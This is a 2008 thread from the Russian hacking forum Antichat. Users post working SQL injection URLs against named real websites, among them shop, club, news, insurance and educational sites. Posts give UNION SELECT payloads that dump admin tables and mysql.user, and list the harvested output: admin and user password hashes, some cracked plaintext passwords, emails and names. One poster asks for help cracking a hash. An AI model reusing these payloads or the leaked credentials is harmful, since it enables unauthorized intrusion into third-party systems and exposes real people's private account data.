Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.06.2008, 14:55
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://www.cageprisoners.com/page.php?id=-3+union+select+1,2,concat_ws(0x3a,id,username,pass word,email,level,last_login)+from+admins+limit+0,1/*
5.0.22
admin:NZnlqRHG2GH8RHmHnShvb/
но так как такого хеша , по моему, нету поэтому вот вариации хешей всех админов при добавке $1$$ или $apr1$$ md5(Unix) или md5(APR) соответственно
$1$$M3TkIDtI14ob4MPCg42FO1
$1$$lw5UAzT2SsIuEfwZqZ45Z1
$1$$1xIcgmF403/oVi4lWT/mp/
$1$$MY4aW1u.6HE0oCMmBPGbS0
$1$$LhrLb2O5uxhivwYrDPGSj1
$1$$Eg92rdb3Ur7jmxG/Ip5na/
$1$$lEiUe5NQPjWHfblYeq8np/
$1$$eoqd8CPMgb77qCBgf4hA2/
$1$$NZnlqRHG2GH8RHmHnShvb/
$apr1$$M3TkIDtI14ob4MPCg42FO1
$apr1$$lw5UAzT2SsIuEfwZqZ45Z1
$apr1$$1xIcgmF403/oVi4lWT/mp/
$apr1$$MY4aW1u.6HE0oCMmBPGbS0
$apr1$$LhrLb2O5uxhivwYrDPGSj1
$apr1$$Eg92rdb3Ur7jmxG/Ip5na/
$apr1$$lEiUe5NQPjWHfblYeq8np/
$apr1$$eoqd8CPMgb77qCBgf4hA2/
$apr1$$NZnlqRHG2GH8RHmHnShvb/
|
|
|
09.06.2008, 17:22
|
|
Участник форума
Регистрация: 15.05.2008
Сообщений: 166
Провел на форуме:
2591223
Репутация:
128
|
|
http://www.hardvision.ru
Сама уязвимость:
Код:
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,user(),3/*
Код HTML:
login: foto
database: hardvision
version:5.0.45-5-log
Мой первый пост на форуме =)
|
|
|
|
09.06.2008, 18:21
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462
Репутация:
91
|
|
Код:
http://www.hrv-club.ru/articles.php?m=opit'+UNION+SELECT+1,user,3,4,5,6,7,8+FROM%20mysql.user/*
Код:
http://www.hrv-club.ru/articles.php?m=opit'+UNION+SELECT+1,password,3,4,5,6,7,8+FROM%20mysql.user/*
Код:
http://www.hrv-club.ru/articles.php?m=opit'+UNION+SELECT+1,concat_ws(0x3A,table_schema,TABLE_NAME),3,4,5,6,7,8+FROM%20INFORMATION_SCHEMA.TABLES/*
А вот к форумной бд хз как подойти. Форум ломается обычным сплоитом и админы этого форума присутсвуют еще на 10 других, и везде админка форума защищена какойто дрянью... Мне кажется это "сеть" форумов 
Если вдруг комуто очень надо будет, дам админский пасс, чтобы не ломились непонятные люди на форум и неписали какие они крутые кулхацкеры =/ |
|
|
|
09.06.2008, 18:59
|
|
Участник форума
Регистрация: 15.05.2008
Сообщений: 166
Провел на форуме:
2591223
Репутация:
128
|
|
Один очень симпатичный еврейский институт(никакой розьни  )
www.shalom.edu.au
Домен в зоне .edu (образование)
Бажный линк:
Код HTML:
http://www.shalom.edu.au/contentPage.php?id=-139+union+select+1,2,version(),4/**/&parentId=1'
До конца доводить не решил(влом),но базовые данные выложу:
PHP код:
база данных: shalom_shalom (уже смешно :) )
юзер: shalom_limmudozD@localhost (шас описаюсь )))
версия: 4.1.22-standard-log
Между прочим у них очень красивые фотки и СОВСЕМ не фильтрующиея знаки..
Последний раз редактировалось fatalo; 09.06.2008 в 19:01..
|
|
|
|
09.06.2008, 19:26
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
Сообщение от fatalo
http://www.hardvision.ru
Сама уязвимость:
Код:
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,user(),3/*
Код HTML:
login: foto
database: hardvision
version:5.0.45-5-log
Мой первый пост на форуме =)
хоть и твой первый пост .. но ты должен помнить ! что скулю надо раскручивать если есть такая возможность ! (5ая версия так что тут даже думать нечего !)
================================================== ============
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,username,passwor d),3+from+hvbb.user+limit+6111,1/*
6к юзеров от булки - md5(md5($pass).$salt)
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passwd),3+f rom+foto.admin_table/*
digit:30bf4fb4729f382ca2010fd445f1796d:mityap123
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passw,kode) ,3+from+foto.users+limit+0,1/*
юзерские логины-пароли от сервиса www.getfoto.ru
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,username,passwor d),3+from+hardvision.adrobot_affiliates/*
hardvision:0b1f34d5c98ace48972bf71ccb6d5218:mityap13
|
|
|
|
09.06.2008, 19:54
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Код:
http://toyota-opa.ru/articles.php?m=-1'%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/*
5.0.45/opa/root@localhost
Код:
http://www.vitz.ru/articles.php?m=opit&type=-1'%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/*
5.0.45/vitz_2/root@localhost
Код:
http://www.raum.ru/articles.php?m=opit&type=-1'%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/*
5.0.45/vitz/root@localhost |
|
|
|
09.06.2008, 21:07
|
|
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086
Репутация:
135
|
|
mobilka.com.ua
mobilka.com.ua
_http://mobilka.com.ua/melodies/download.php?id=-3206+union+select+1,version(),3,4,5,6--
|
|
|
|
09.06.2008, 21:52
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462
Репутация:
91
|
|
Hande hoch! Gitler kaput! Ich bin bose!
Код:
http://www.fulde-versicherungen.de/efnews/index.php?shownews=2'+UNION+SELECT+1,2,username,4,pwd,6,7,8,9,10,11,12+FROM+ef01pfuser/*
|
|
|
|
09.06.2008, 22:03
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
RANX.ru Знакомства по фотографиям! Без громоздких анкет!
http://ranx.ru/?showFoto=-1+union+select+1,2,concat_ws(0x3a,name,password,em ail),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+user s/*
Андрей  as$w0rd:info@ranx.ru - админ
Антон:ranx.ru:myxolove@mail.ru
ГУЛЬНАРА:timeryn04:gulyaniz@mail.ru
пароли были в Base64  |
|
|
|
09.06.2008, 22:23
|
|
Новичок
Регистрация: 11.05.2008
Сообщений: 12
Провел на форуме:
36048
Репутация:
5
|
|
ребята кто поможет с хешем $1$AOOiO7Zi$2he3AqhhFU8197ojSz9bn/
очень срочно нада базы непринимают пишут что некоректный но он таков и нада както его росшифравать сменя +++
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
